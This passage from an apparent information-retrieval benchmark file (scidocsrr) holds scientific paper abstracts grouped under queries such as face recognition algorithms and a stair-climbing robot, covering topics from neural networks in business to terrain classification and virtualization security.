"text": "In recent two decades, artificial neural networks have been extensively used in many business applications. Despite the growing number of research papers, only few studies have been presented focusing on the overview of published findings in this important and popular area. Moreover, the majority of these reviews was introduced more than 15 years ago. The aim of this work is to expand the range of earlier surveys and provide a systematic overview of neural network applications in business between 1994 and 2015. We have covered a total of 412 articles and classified them according to the year of publication, application area, type of neural network, learning algorithm, benchmark method, citations and journal. Our investigation revealed that most of the research has aimed at financial di tress and bankruptcy problems, stock price forecasting, and decision support, with special attention to classification tasks. Besides conventional multilayer feedforward network with gradient descent backpropagation, various hybrid networks have been developed in order to improve the performance of standard models. Even though neural networks have been established as wellknown method in business, there is enormous space for additional research in order to improve their functioning and increase our understanding of this influential area.",
"title": ""
}
] | scidocsrr |
e21fd0d1c614d69bf0aa58088f4c67bb | Face Recognition Algorithms | [
{
"docid": "4a9ad387ad16727d9ac15ac667d2b1c3",
"text": "In recent years face recognition has received substantial attention from both research communities and the market, but still remained very challenging in real applications. A lot of face recognition algorithms, along with their modifications, have been developed during the past decades. A number of typical algorithms are presented, being categorized into appearancebased and model-based schemes. For appearance-based methods, three linear subspace analysis schemes are presented, and several non-linear manifold analysis approaches for face recognition are briefly described. The model-based approaches are introduced, including Elastic Bunch Graph matching, Active Appearance Model and 3D Morphable Model methods. A number of face databases available in the public domain and several published performance evaluation results are digested. Future research directions based on the current recognition results are pointed out.",
"title": ""
}
] | [
{
"docid": "11f84f99de269ca5ca43fc6d761504b7",
"text": "Effective use of distributed collaboration environments requires shared mental models that guide users in sensemaking and categorization. In Lotus Notes -based collaboration systems, such shared models are usually implemented as views and document types. TeamRoom, developed at Lotus Institute, implements in its design a theory of effective social process that creates a set of team-specific categories, which can then be used as a basis for knowledge sharing, collaboration, and team memory. This paper reports an exploratory study in collective concept formation in the TeamRoom environment. The study was run in an ecological setting, while the team members used the system for their everyday work. We apply theory developed by Lev Vygotsky, and use a modified version of an experiment on concept formation, devised by Lev Sakharov, and discussed in Vygotsky (1986). Vygotsky emphasized the role of language, cognitive artifacts, and historical and social sources in the development of thought processes. Within the Vygotskian framework it becomes clear that development of thinking does not end in adolescence. In teams of adult people, learning and knowledge creation are continuous processes. New concepts are created, shared, and developed into systems. The question, then, becomes how spontaneous concepts are collectively generated in teams, how they become integrated as systems, and how computer mediated collaboration environments affect these processes. d in ittle ons",
"title": ""
},
{
"docid": "fd5efb029ab7f69f73a97f567ac9aa1a",
"text": "Current offshore wind farms (OWFs) design processes are based on a sequential approach which does not guarantee system optimality because it oversimplifies the problem by discarding important interdependencies between design aspects. This article presents a framework to integrate, automate and optimize the design of OWF layouts and the respective electrical infrastructures. The proposed framework optimizes simultaneously different goals (e.g., annual energy delivered and investment cost) which leads to efficient trade-offs during the design phase, e.g., reduction of wake losses vs collection system length. Furthermore, the proposed framework is independent of economic assumptions, meaning that no a priori values such as the interest rate or energy price, are needed. The proposed framework was applied to the Dutch Borssele areas I and II. A wide range of OWF layouts were obtained through the optimization framework. OWFs with similar energy production and investment cost as layouts designed with standard sequential strategies were obtained through the framework, meaning that the proposed framework has the capability to create different OWF layouts that would have been missed by the designers. In conclusion, the proposed multi-objective optimization framework represents a mind shift in design tools for OWFs which allows cost savings in the design and operation phases.",
"title": ""
},
{
"docid": "cff8ae2635684a6f0e07142175b7fbf1",
"text": "Collaborative writing is on the increase. In order to write well together, authors often need to be aware of who has done what recently. We offer a new tool, DocuViz, that displays the entire revision history of Google Docs, showing more than the one-step-at-a-time view now shown in revision history and tracking changes in Word. We introduce the tool and present cases in which the tool has the potential to be useful: To authors themselves to see recent \"seismic activity,\" indicating where in particular a co-author might want to pay attention, to instructors to see who has contributed what and which changes were made to comments from them, and to researchers interested in the new patterns of collaboration made possible by simultaneous editing capabilities.",
"title": ""
},
{
"docid": "bfa659ff24af7c319702a6a8c0c7dca3",
"text": "In this letter, a grounded coplanar waveguide-to-microstrip (GCPW-to-MS) transition without via holes is presented. The transition is designed on a PET® substrate and fabricated using inkjet printing technology. To our knowledge, fabrication of transitions using inkjet printing technology has not been reported in the literature. The simulations have been performed using HFSS® software and the measurements have been carried out using a Vector Network Analyzer on a broad frequency band from 40 to 85 GHz. The effect of varying several geometrical parameters of the GCPW-to-MS on the electromagnetic response is also presented. The results obtained demonstrate good characteristics of the insertion loss better than 1.5 dB, and return loss larger than 10 dB in the V-band (50-75 GHz). Such transitions are suitable for characterization of microwave components built on different flexible substrates.",
"title": ""
},
{
"docid": "4cb34eda6145a8ea0ccc22b3e547b5e5",
"text": "The factors that contribute to individual differences in the reward value of cute infant facial characteristics are poorly understood. Here we show that the effect of cuteness on a behavioural measure of the reward value of infant faces is greater among women reporting strong maternal tendencies. By contrast, maternal tendencies did not predict women's subjective ratings of the cuteness of these infant faces. These results show, for the first time, that the reward value of infant facial cuteness is greater among women who report being more interested in interacting with infants, implicating maternal tendencies in individual differences in the reward value of infant cuteness. Moreover, our results indicate that the relationship between maternal tendencies and the reward value of infant facial cuteness is not due to individual differences in women's ability to detect infant cuteness. This latter result suggests that individual differences in the reward value of infant cuteness are not simply a by-product of low-cost, functionless biases in the visual system.",
"title": ""
},
{
"docid": "7f48835a746d23edbdaa410800d0d322",
"text": "Nager syndrome, or acrofacial dysostosis type 1 (AFD1), is a rare multiple malformation syndrome characterized by hypoplasia of first and second branchial arches derivatives and appendicular anomalies with variable involvement of the radial/axial ray. In 2012, AFD1 has been associated with dominant mutations in SF3B4. We report a 22-week-old fetus with AFD1 associated with diaphragmatic hernia due to a previously unreported SF3B4 mutation (c.35-2A>G). Defective diaphragmatic development is a rare manifestation in AFD1 as it is described in only 2 previous cases, with molecular confirmation in 1 of them. Our molecular finding adds a novel pathogenic splicing variant to the SF3B4 mutational spectrum and contributes to defining its prenatal/fetal phenotype.",
"title": ""
},
{
"docid": "f3c8158351811c2c9fc0ff2a128d35e0",
"text": "A new feather mite species, Picalgoides giganteus n. sp. (Psoroptoididae: Pandalurinae), is described from the tawny-throated leaftosser Sclerurus mexicanus Sclater (Passeriformes: Furnariidae) in Costa Rica. Among the 10 species of Picalgoides Černý, 1974, including the new one, this is the third recorded from a passerine host; the remaining seven nominal species are associated with hosts of the order Piciformes. Brief data on the host-parasite associations of Picalgoides spp. are provided. Megninia megalixus Trouessart, 1885 from the short-tailed green magpie Cissa thalassina (Temminck) is transferred to Picalgoides as P. megalixus (Trouessart, 1885) n. comb.",
"title": ""
},
{
"docid": "d98b97dae367d57baae6b0211c781d66",
"text": "In this paper we describe a technology for protecting privacy in video systems. The paper presents a review of privacy in video surveillance and describes how a computer vision approach to understanding the video can be used to represent “just enough” of the information contained in a video stream to allow video-based tasks (including both surveillance and other “person aware” applications) to be accomplished, while hiding superfluous details, particularly identity, that can contain privacyintrusive information. The technology has been implemented in the form of a privacy console that manages operator access to different versions of the video-derived data according to access control lists. We have also built PrivacyCam—a smart camera that produces a video stream with the privacy-intrusive information already removed.",
"title": ""
},
{
"docid": "17fde1b7ed30db50790192ea03de2dd1",
"text": "Parsing for clothes in images and videos is a critical step towards understanding the human appearance. In this work, we propose a method to segment clothes in settings where there is no restriction on number and type of clothes, pose of the person, viewing angle, occlusion and number of people. This is a challenging task as clothes, even of the same category, have large variations in color and texture. The presence of human joints is the best indicator for cloth types as most of the clothes are consistently worn around the joints. We incorporate the human joint prior by estimating the body joint distributions using the detectors and learning the cloth-joint co-occurrences of different cloth types with respect to body joints. The cloth-joint and cloth-cloth co-occurrences are used as a part of the conditional random field framework to segment the image into different clothing. Our results indicate that we have outperformed the recent attempt [16] on H3D [3], a fairly complex dataset.",
"title": ""
},
{
"docid": "77a1198ac77a385ef80f5fb0accd1a59",
"text": "An enterprise resource planning system (ERP) is the information backbone of a company that integrates and automates all business operations. It is a critical issue to select the suitable ERP system which meets all the business strategies and the goals of the company. This study presents an approach to select a suitable ERP system for textile industry. Textile companies have some difficulties to implement ERP systems such as variant structure of products, production variety and unqualified human resources. At first, the vision and the strategies of the organization are checked by using balanced scorecard. According to the company’s vision, strategies and KPIs, we can prepare a request for proposal. Then ERP packages that do not meet the requirements of the company are eliminated. After strategic management phase, the proposed methodology gives advice before ERP selection. The criteria were determined and then compared according to their importance. The rest ERP system solutions were selected to evaluate. An external evaluation team consisting of ERP consultants was assigned to select one of these solutions according to the predetermined criteria. In this study, the fuzzy analytic hierarchy process, a fuzzy extension of the multi-criteria decision-making technique AHP, was used to compare these ERP system solutions. The methodology was applied for a textile manufacturing company. 2008 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "dabcbdf63b15dff1153aad4b06303269",
"text": "In this chapter we present an overview of Web personalization process viewed as an application of data mining requiring support for all the phases of a typical data mining cycle. These phases include data collection and preprocessing, pattern discovery and evaluation, and finally applying the discovered knowledge in real-time to mediate between the user and the Web. This view of the personalization process provides added flexibility in leveraging multiple data sources and in effectively using the discovered models in an automatic personalization system. The chapter provides a detailed discussion of a host of activities and techniques used at different stages of this cycle, including the preprocessing and integration of data from multiple sources, as well as pattern discovery techniques that are typically applied to this data. We consider a number of classes of data mining algorithms used particularly for Web personalization, including techniques based on clustering, association rule discovery, sequential pattern mining, Markov models, and probabilistic mixture and hidden (latent) variable models. Finally, we discuss hybrid data mining frameworks that leverage data from a variety of channels to provide more effective personalization solutions.",
"title": ""
},
{
"docid": "57ff834b30f5e0f31c3382fed9c2a8ee",
"text": "Today's vehicles are becoming cyber-physical systems that not only communicate with other vehicles but also gather various information from hundreds of sensors within them. These developments help create smart and connected (e.g., self-driving) vehicles that will introduce significant information to drivers, manufacturers, insurance companies, and maintenance service providers for various applications. One such application that is becoming crucial with the introduction of self-driving cars is forensic analysis of traffic accidents. The utilization of vehicle-related data can be instrumental in post-accident scenarios to discover the faulty party, particularly for self-driving vehicles. With the opportunity of being able to access various information in cars, we propose a permissioned blockchain framework among the various elements involved to manage the collected vehicle-related data. Specifically, we first integrate vehicular public key infrastructure (VPKI) to the proposed blockchain to provide membership establishment and privacy. Next, we design a fragmented ledger that will store detailed data related to vehicles such as maintenance information/ history, car diagnosis reports, and so on. The proposed forensic framework enables trustless, traceable, and privacy-aware post-accident analysis with minimal storage and processing overhead.",
"title": ""
},
{
"docid": "30e89edb65cbf54b27115c037ee9c322",
"text": "AbstructIGBT’s are available with short-circuit withstand times approaching those of bipolar transistors. These IGBT’s can therefore be protected by the same relatively slow-acting circuitry. The more efficient IGBT’s, however, have lower shortcircuit withstand times. While protection of these types of IGBT’s is not difficult, it does require a reassessment of the traditional protection methods used for the bipolar transistors. An in-depth discussion on the behavior of IGBT’s under different short-circuit conditions is carried out and the effects of various parameters on permissible short-circuit time are analyzed. The paper also rethinks the problem of providing short-circuit protection in relation to the special characteristics of the most efficient IGBT’s. The pros and cons of some of the existing protection circuits are discussed and, based on the recommendations, a protection scheme is implemented to demonstrate that reliable short-circuit protection of these types of IGBT’s can be achieved without difficulty in a PWM motor-drive application. volts",
"title": ""
},
{
"docid": "260b39661df5cb7ddb9c4cf7ab8a36ba",
"text": "Deblurring camera-based document image is an important task in digital document processing, since it can improve both the accuracy of optical character recognition systems and the visual quality of document images. Traditional deblurring algorithms have been proposed to work for natural-scene images. However the natural-scene images are not consistent with document images. In this paper, the distinct characteristics of document images are investigated. We propose a content-aware prior for document image deblurring. It is based on document image foreground segmentation. Besides, an upper-bound constraint combined with total variation based method is proposed to suppress the rings in the deblurred image. Comparing with the traditional general purpose deblurring methods, the proposed deblurring algorithm can produce more pleasing results on document images. Encouraging experimental results demonstrate the efficacy of the proposed method.",
"title": ""
},
{
"docid": "1bb5e01e596d09e4ff89d7cb864ff205",
"text": "A number of recent approaches have used deep convolutional neural networks (CNNs) to build texture representations. Nevertheless, it is still unclear how these models represent texture and invariances to categorical variations. This work conducts a systematic evaluation of recent CNN-based texture descriptors for recognition and attempts to understand the nature of invariances captured by these representations. First we show that the recently proposed bilinear CNN model [25] is an excellent generalpurpose texture descriptor and compares favorably to other CNN-based descriptors on various texture and scene recognition benchmarks. The model is translationally invariant and obtains better accuracy on the ImageNet dataset without requiring spatial jittering of data compared to corresponding models trained with spatial jittering. Based on recent work [13, 28] we propose a technique to visualize pre-images, providing a means for understanding categorical properties that are captured by these representations. Finally, we show preliminary results on how a unified parametric model of texture analysis and synthesis can be used for attribute-based image manipulation, e.g. to make an image more swirly, honeycombed, or knitted. The source code and additional visualizations are available at http://vis-www.cs.umass.edu/texture.",
"title": ""
},
{
"docid": "43e831b69559ae228bae68b369dac2e3",
"text": "Virtualization technology enables Cloud providers to efficiently use their computing services and resources. Even if the benefits in terms of performance, maintenance, and cost are evident, however, virtualization has also been exploited by attackers to devise new ways to compromise a system. To address these problems, research security solutions have evolved considerably over the years to cope with new attacks and threat models. In this work, we review the protection strategies proposed in the literature and show how some of the solutions have been invalidated by new attacks, or threat models, that were previously not considered. The goal is to show the evolution of the threats, and of the related security and trust assumptions, in virtualized systems that have given rise to complex threat models and the corresponding sophistication of protection strategies to deal with such attacks. We also categorize threat models, security and trust assumptions, and attacks against a virtualized system at the different layers—in particular, hardware, virtualization, OS, and application.",
"title": ""
},
{
"docid": "cca94491276328a03e0a56e7460bf50f",
"text": "Because of large amounts of unstructured data generated on the Internet, entity relation extraction is believed to have high commercial value. Entity relation extraction is a case of information extraction and it is based on entity recognition. This paper firstly gives a brief overview of relation extraction. On the basis of reviewing the history of relation extraction, the research status of relation extraction is analyzed. Then the paper divides theses research into three categories: supervised machine learning methods, semi-supervised machine learning methods and unsupervised machine learning method, and toward to the deep learning direction.",
"title": ""
},
{
"docid": "b38939ec3c6f8e10553f934ceab401ff",
"text": "According to recent work in the new field of lexical pragmatics, the meanings of words are frequently pragmatically adjusted and fine-tuned in context, so that their contribution to the proposition expressed is different from their lexically encoded sense. Well-known examples include lexical narrowing (e.g. ‘drink’ used to mean ALCOHOLIC DRINK), approximation (or loosening) (e.g. ‘flat’ used to mean RELATIVELY FLAT) and metaphorical extension (e.g. ‘bulldozer’ used to mean FORCEFUL PERSON). These three phenomena are often studied in isolation from each other and given quite distinct kinds of explanation. In this chapter, we will propose a more unified account. We will try to show that narrowing, loosening and metaphorical extension are simply different outcomes of a single interpretive process which creates an ad hoc concept, or occasion-specific sense, based on interaction among encoded concepts, contextual information and pragmatic expectations or principles. We will outline an inferential account of the lexical adjustment process using the framework of relevance theory, and compare it with some alternative accounts. * This work is part of an AHRC-funded project ‘A Unified Theory of Lexical Pragmatics’ (AR16356). We are grateful to our research assistants, Patricia Kolaiti, Tim Wharton and, in particular, Rosa Vega Moreno, whose PhD work on metaphor we draw on in this paper, and to Vladimir Žegarac, François Recanati, Nausicaa Pouscoulous, Paula Rubio Fernandez and Hanna Stoever, for helpful discussions. We would also like to thank Dan Sperber for sharing with us many valuable insights on metaphor and on lexical pragmatics more generally.",
"title": ""
},
{
"docid": "170cd125882865150428b521d6220929",
"text": "In this paper, we propose a novel approach for action classification in soccer videos using a recurrent neural network scheme. Thereby, we extract from each video action at each timestep a set of features which describe both the visual content (by the mean of a BoW approach) and the dominant motion (with a key point based approach). A Long Short-Term Memory-based Recurrent Neural Network is then trained to classify each video sequence considering the temporal evolution of the features for each timestep. Experimental results on the MICC-Soccer-Actions-4 database show that the proposed approach outperforms classification methods of related works (with a classification rate of 77 %), and that the combination of the two features (BoW and dominant motion) leads to a classification rate of 92 %.",
"title": ""
},
{
"docid": "088d6f1cd3c19765df8a16cd1a241d18",
"text": "Legged robots need to be able to classify and recognize different terrains to adapt their gait accordingly. Recent works in terrain classification use different types of sensors (like stereovision, 3D laser range, and tactile sensors) and their combination. However, such sensor systems require more computing power, produce extra load to legged robots, and/or might be difficult to install on a small size legged robot. In this work, we present an online terrain classification system. It uses only a monocular camera with a feature-based terrain classification algorithm which is robust to changes in illumination and view points. For this algorithm, we extract local features of terrains using either Scale Invariant Feature Transform (SIFT) or Speed Up Robust Feature (SURF). We encode the features using the Bag of Words (BoW) technique, and then classify the words using Support Vector Machines (SVMs) with a radial basis function kernel. We compare this feature-based approach with a color-based approach on the Caltech-256 benchmark as well as eight different terrain image sets (grass, gravel, pavement, sand, asphalt, floor, mud, and fine gravel). For terrain images, we observe up to 90% accuracy with the feature-based approach. Finally, this online terrain classification system is successfully applied to our small hexapod robot AMOS II. The output of the system providing terrain information is used as an input to its neural locomotion control to trigger an energy-efficient gait while traversing different terrains.",
"title": ""
}
] | scidocsrr |
b40b2f5cc8166c6ee058c1c756d18a9d | ‘TuskBot’: Design of the mobile stair climbing 2 by 2 wheels robot platform with novel passive structure ‘Tusk’ | [
{
"docid": "1914a215d1b937f544a60890f167dd49",
"text": "In our paper we present an innovative locomotion concept for rough terrain based on six motorized wheels. Using rhombus configuration, the rover named Shrimp has a steering wheel in the front and the rear, and two wheels arranged on a bogie on each side. The front wheel has a spring suspension to guarantee optimal ground contact of all wheels at any time. The steering of the rover is realized by synchronizing the steering of the front and rear wheels and the speed difference of the bogie wheels. This allows for precision maneuvers and even turning on the spot with minimum slippage. The use of parallel articulations for the front wheel and the bogies enables to set a virtual center of rotation at the level of or below the wheel axis. This insures maximum stability and climbing abilities even for very low friction coefficients between the wheel and the ground. A well functioning prototype has been designed and manufactured. It shows excellent performance surpassing our expectations. The robot, measuring only about 60 cm in length and 20 cm in height, is able to passively overcome obstacles of up to two times its wheel diameter and can climb stairs with steps of over 20 cm. © 2002 Elsevier Science B.V. All rights reserved.",
"title": ""
}
] | [
{
"docid": "7d3f0c22674ac3febe309c2440ad3d90",
"text": "MAC address randomization is a common privacy protection measure deployed in major operating systems today. It is used to prevent user-tracking with probe requests that are transmitted during IEEE 802.11 network scans. We present an attack to defeat MAC address randomization through observation of the timings of the network scans with an off-the-shelf Wi-Fi interface. This attack relies on a signature based on inter-frame arrival times of probe requests, which is used to group together frames coming from the same device although they use distinct MAC addresses. We propose several distance metrics based on timing and use them together with an incremental learning algorithm in order to group frames. We show that these signatures are consistent over time and can be used as a pseudo-identifier to track devices. Our framework is able to correctly group frames using different MAC addresses but belonging to the same device in up to 75% of the cases. These results show that the timing of 802.11 probe frames can be abused to track individual devices and that address randomization alone is not always enough to protect users against tracking.",
"title": ""
},
{
"docid": "c5c7e3f4c18f660281a5bc25077aa184",
"text": "Procrastination, Academic Success and the Effectiveness of a Remedial Program Procrastination produces harmful effects for human capital investments and studying activities. Using data from a large sample of Italian undergraduates, we measure procrastination with the actual behaviour of students, considering the delay in finalizing their university enrolment procedure. We firstly show that procrastination is a strong predictor of students’ educational achievements. This result holds true controlling for quite reliable measures of cognitive abilities, a number of background characteristics and indicators of students’ motivation. Secondly, we investigate, using a Regression Discontinuity Design, the effects of a remedial program in helping students with different propensity to procrastinate. We show that the policy especially advantages students who tend to procrastinate, suggesting that also policies not directly aimed at handling procrastination can help to solve self-control problems. JEL Classification: D03, I21, D91, J01, J24",
"title": ""
},
{
"docid": "64fb3fdb4f37ee75b1506c2fdb09cf7a",
"text": "With the proliferation of mobile devices, cloud-based photo sharing and searching services are becoming common du e to the mobile devices’ resource constrains. Meanwhile, the r is also increasing concern about privacy in photos. In this wor k, we present a framework SouTu, which enables cloud servers to provide privacy-preserving photo sharing and search as a se rvice to mobile device users. Privacy-seeking users can share the ir photos via our framework to allow only their authorized frie nds to browse and search their photos using resource-bounded mo bile devices. This is achieved by our carefully designed archite cture and novel outsourced privacy-preserving computation prot ocols, through which no information about the outsourced photos or even the search contents (including the results) would be revealed to the cloud servers. Our framework is compatible with most of the existing image search technologies, and it requi res few changes to the existing cloud systems. The evaluation of our prototype system with 31,772 real-life images shows the communication and computation efficiency of our system.",
"title": ""
},
{
"docid": "97578b3a8f5f34c96e7888f273d4494f",
"text": "We analyze the use, advantages, and drawbacks of graph kernels in chemoin-formatics, including a comparison of kernel-based approaches with other methodology, as well as examples of applications. Kernel-based machine learning [1], now widely applied in chemoinformatics, delivers state-of-the-art performance [2] in tasks like classification and regression. Molecular graph kernels [3] are a recent development where kernels are defined directly on the molecular structure graph. This allows the adaptation of methods from graph theory to structure graphs and their direct use with kernel learning algorithms. The main advantage of kernel learning, the so-called “kernel trick”, allows for a systematic, computationally feasible, and often globally optimal search for non-linear patterns, as well as the direct use of non-numerical inputs such as strings and graphs. A drawback is that solutions are expressed indirectly in terms of similarity to training samples, and runtimes that are typically quadratic or cubic in the number of training samples. Graph kernels [3] are positive semidefinite functions defined directly on graphs. The most important types are based on random walks, subgraph patterns, optimal assignments, and graphlets. Molecular structure graphs have strong properties that can be exploited [4], e.g., they are undirected, have no self-loops and no multiple edges, are connected (except for salts), annotated, often planar in the graph-theoretic sense, and their vertex degree is bounded by a small constant. In many applications, they are small. Many graph kernels are generalpurpose, some are suitable for structure graphs, and a few have been explicitly designed for them. We present three exemplary applications of the iterative similarity optimal assignment kernel [5], which was designed for the comparison of small structure graphs: The discovery of novel agonists of the peroxisome proliferator-activated receptor g [6] (ligand-based virtual screening), the estimation of acid dissociation constants [7] (quantitative structure-property relationships), and molecular de novo design [8].",
"title": ""
},
{
"docid": "0343f1a0be08ff53e148ef2eb22aaf14",
"text": "Tables are a ubiquitous form of communication. While everyone seems to know what a table is, a precise, analytical definition of “tabularity” remains elusive because some bureaucratic forms, multicolumn text layouts, and schematic drawings share many characteristics of tables. There are significant differences between typeset tables, electronic files designed for display of tables, and tables in symbolic form intended for information retrieval. Most past research has addressed the extraction of low-level geometric information from raster images of tables scanned from printed documents, although there is growing interest in the processing of tables in electronic form as well. Recent research on table composition and table analysis has improved our understanding of the distinction between the logical and physical structures of tables, and has led to improved formalisms for modeling tables. This review, which is structured in terms of generalized paradigms for table processing, indicates that progress on half-a-dozen specific research issues would open the door to using existing paper and electronic tables for database update, tabular browsing, structured information retrieval through graphical and audio interfaces, multimedia table editing, and platform-independent display.",
"title": ""
},
{
"docid": "35e73af4b9f6a32c0fd4e31fde871f8a",
"text": "In this paper, a novel three-phase soft-switching inverter is presented. The inverter-switch turn on and turn off are performed under zero-voltage switching condition. This inverter has only one auxiliary switch, which is also soft switched. Having one auxiliary switch simplifies the control circuit considerably. The proposed inverter is analyzed, and its operating modes are explained in details. The design considerations of the proposed inverter are presented. The experimental results of the prototype inverter confirm the theoretical analysis.",
"title": ""
},
{
"docid": "b14b16c0380202be9e909c87c1bb2bcf",
"text": "Active learning is a useful technique for tasks for which unlabeled data is abundant but manual labeling is expensive. One example of such a task is semantic role labeling (SRL), which relies heavily on labels from trained linguistic experts. One challenge in applying active learning algorithms for SRL is that the complete knowledge of the SRL model is often unavailable, against the common assumption that active learning methods are aware of the details of the underlying models. In this paper, we present an active learning framework for blackbox SRL models (i.e., models whose details are unknown). In lieu of a query strategy based on model details, we propose a neural query strategy model that embeds both language and semantic information to automatically learn the query strategy from predictions of an SRL model alone. Our experimental results demonstrate the effectiveness of both this new active learning framework and the neural query strategy model.",
"title": ""
},
{
"docid": "78e1e3c496986a669a5a118f095424f5",
"text": "A serms of increasingly accurate algorithms to obtain approximate solutions to the 0/1 one-dlmensmnal knapsack problem :s presented Each algorithm guarantees a certain minimal closeness to the optimal solution value The approximate algorithms are of polynomml time complexity and reqmre only linear storage Computatmnal expermnce with these algorithms is also presented",
"title": ""
},
{
"docid": "a4473c2cc7da3fb5ee52b60cee24b9b9",
"text": "The ALVINN (Autonomous h d Vehide In a N d Network) projea addresses the problem of training ani&ial naxal naarork in real time to perform difficult perapaon tasks. A L W is a back-propagation network dmpd to dnve the CMU Navlab. a modided Chevy van. 'Ibis ptpa describes the training techniques which allow ALVIN\" to luun in under 5 minutes to autonomously conm>l the Navlab by wardung ahuamr, dziver's rmaions. Usingthese technrques A L W has b&n trained to drive in a variety of Cirarmstanccs including single-lane paved and unprved roads. and multi-lane lined and rmlinecd roads, at speeds of up IO 20 miles per hour",
"title": ""
},
{
"docid": "e34a61754ff8cfac053af5cbedadd9e0",
"text": "An ongoing, annual survey of publications in systems and software engineering identifies the top 15 scholars and institutions in the field over a 5-year period. Each ranking is based on the weighted scores of the number of papers published in TSE, TOSEM, JSS, SPE, EMSE, IST, and Software of the corresponding period. This report summarizes the results for 2003–2007 and 2004–2008. The top-ranked institution is Korea Advanced Institute of Science and Technology, Korea for 2003–2007, and Simula Research Laboratory, Norway for 2004–2008, while Magne Jørgensen is the top-ranked scholar for both periods.",
"title": ""
},
{
"docid": "59193c85b2763629c6258927afe0e90f",
"text": "The techniques used in fault diagnosis of automotive engine oils are discussed. The importance of Oil change at the right time and the effect of parameters like water contamination, particle contamination, oxidation, viscosity, fuel content in oil are also discussed. Analysis is carried out on MATLAB with reference to the variation of Dielectric constant of lubrication oil over the use period. The program is designed to display the values of Iron content (particles), water content, density and Acid value at particular instant and display the condition of oil in terms of parameter.",
"title": ""
},
{
"docid": "8655653e5a4a64518af8da996ac17c25",
"text": "Although a rigorous review of literature is essential for any research endeavor, technical solutions that support systematic literature review approaches are still scarce. Systematic literature searches in particular are often described as complex, error-prone and time-consuming, due to the prevailing lack of adequate technical support. In this study, we therefore aim to learn how to design information systems that effectively facilitate systematic literature searches. Using the design science research paradigm, we develop design principles that intend to increase comprehensiveness, precision, and reproducibility of systematic literature searches. The design principles are derived through multiple design cycles that include the instantiation of the principles in form of a prototype web application and qualitative evaluations. Our design knowledge could serve as a foundation for future research on systematic search systems and support the development of innovative information systems that, eventually, improve the quality and efficiency of systematic literature reviews.",
"title": ""
},
{
"docid": "a2c60bde044287457ade061a0e9370c0",
"text": "Despite modern advances in the prevention of dental caries and an increased understanding of the importance of maintaining the natural dentition in children, many abscessed and infected primary teeth, especially the deciduous molars, are still being prematurely lost through extractions. This report describes a simple, quick and effective technique that has been successfully used to manage infected, abscessed primary teeth. Results indicate that the non-vital primary pulp therapy technique is both reliable and effective. Not only is the procedure painless, it also helps to relieve the child of his immediate pain and achieves the primary goals of elimination of infection and retention of the tooth in a functional state without endangering the developing permanent tooth germ.",
"title": ""
},
{
"docid": "a09874d27b82fd0055e0f35f4106fb2c",
"text": "We introduce a simple music notation system based on onomatopoeia. Although many text-based music notation systems have been proposed, most of them are cryptic and much more difficult to understand than standard graphical musical scores. Our music notation system, called the Sutoton notation, is based on onomatopoeia and note names which are easily pronounceable by humans with no extra training. Although being simple, Sutoton notation has been used in a variety of systems and loved by many hobbyists.",
"title": ""
},
{
"docid": "b4a50cddb96379dc55ce2476dad01dfa",
"text": "Many of the industrial and research databases are plagued by the problem of missing values. Some evident examples include databases associated with instrument maintenance, medical applications, and surveys. One of the common ways to cope with missing values is to complete their imputation (filling in). Given the rapid growth of sizes of databases, it becomes imperative to come up with a new imputation methodology along with efficient algorithms. The main objective of this paper is to develop a unified framework supporting a host of imputation methods. In the development of this framework, we require that its usage should (on average) lead to the significant improvement of accuracy of imputation while maintaining the same asymptotic computational complexity of the individual methods. Our intent is to provide a comprehensive review of the representative imputation techniques. It is noticeable that the use of the framework in the case of a low-quality single-imputation method has resulted in the imputation accuracy that is comparable to the one achieved when dealing with some other advanced imputation techniques. We also demonstrate, both theoretically and experimentally, that the application of the proposed framework leads to a linear computational complexity and, therefore, does not affect the asymptotic complexity of the associated imputation method.",
"title": ""
},
{
"docid": "60da71841669948e0a57ba4673693791",
"text": "AIMS\nStiffening of the large arteries is a common feature of aging and is exacerbated by a number of disorders such as hypertension, diabetes, and renal disease. Arterial stiffening is recognized as an important and independent risk factor for cardiovascular events. This article will provide a comprehensive review of the recent advance on assessment of arterial stiffness as a translational medicine biomarker for cardiovascular risk.\n\n\nDISCUSSIONS\nThe key topics related to the mechanisms of arterial stiffness, the methodologies commonly used to measure arterial stiffness, and the potential therapeutic strategies are discussed. A number of factors are associated with arterial stiffness and may even contribute to it, including endothelial dysfunction, altered vascular smooth muscle cell (SMC) function, vascular inflammation, and genetic determinants, which overlap in a large degree with atherosclerosis. Arterial stiffness is represented by biomarkers that can be measured noninvasively in large populations. The most commonly used methodologies include pulse wave velocity (PWV), relating change in vessel diameter (or area) to distending pressure, arterial pulse waveform analysis, and ambulatory arterial stiffness index (AASI). The advantages and limitations of these key methodologies for monitoring arterial stiffness are reviewed in this article. In addition, the potential utility of arterial stiffness as a translational medicine surrogate biomarker for evaluation of new potentially vascular protective drugs is evaluated.\n\n\nCONCLUSIONS\nAssessment of arterial stiffness is a sensitive and useful biomarker of cardiovascular risk because of its underlying pathophysiological mechanisms. PWV is an emerging biomarker useful for reflecting risk stratification of patients and for assessing pharmacodynamic effects and efficacy in clinical studies.",
"title": ""
},
{
"docid": "7a1a9ed8e9a6206c3eaf20da0c156c14",
"text": "Formal modeling rules can be used to ensure that an enterprise architecture is correct. Despite their apparent utility and despite mature tool support, formal modelling rules are rarely, if ever, used in practice in enterprise architecture in industry. In this paper we propose a rule authoring method that we believe aligns with actual modelling practice, at least as witnessed in enterprise architecture projects at the Swedish Defence Materiel Administration. The proposed method follows the business rules approach: the rules are specified in a (controlled) natural language which makes them accessible to all stakeholders and easy to modify as the meta-model matures and evolves over time. The method was put to test during 2014 in two large scale enterprise architecture projects, and we report on the experiences from that. To the best of our knowledge, this is the first time extensive formal modelling rules for enterprise architecture has been tested in industry and reported in the",
"title": ""
},
{
"docid": "bd47b468b1754ddd9fecf8620eb0b037",
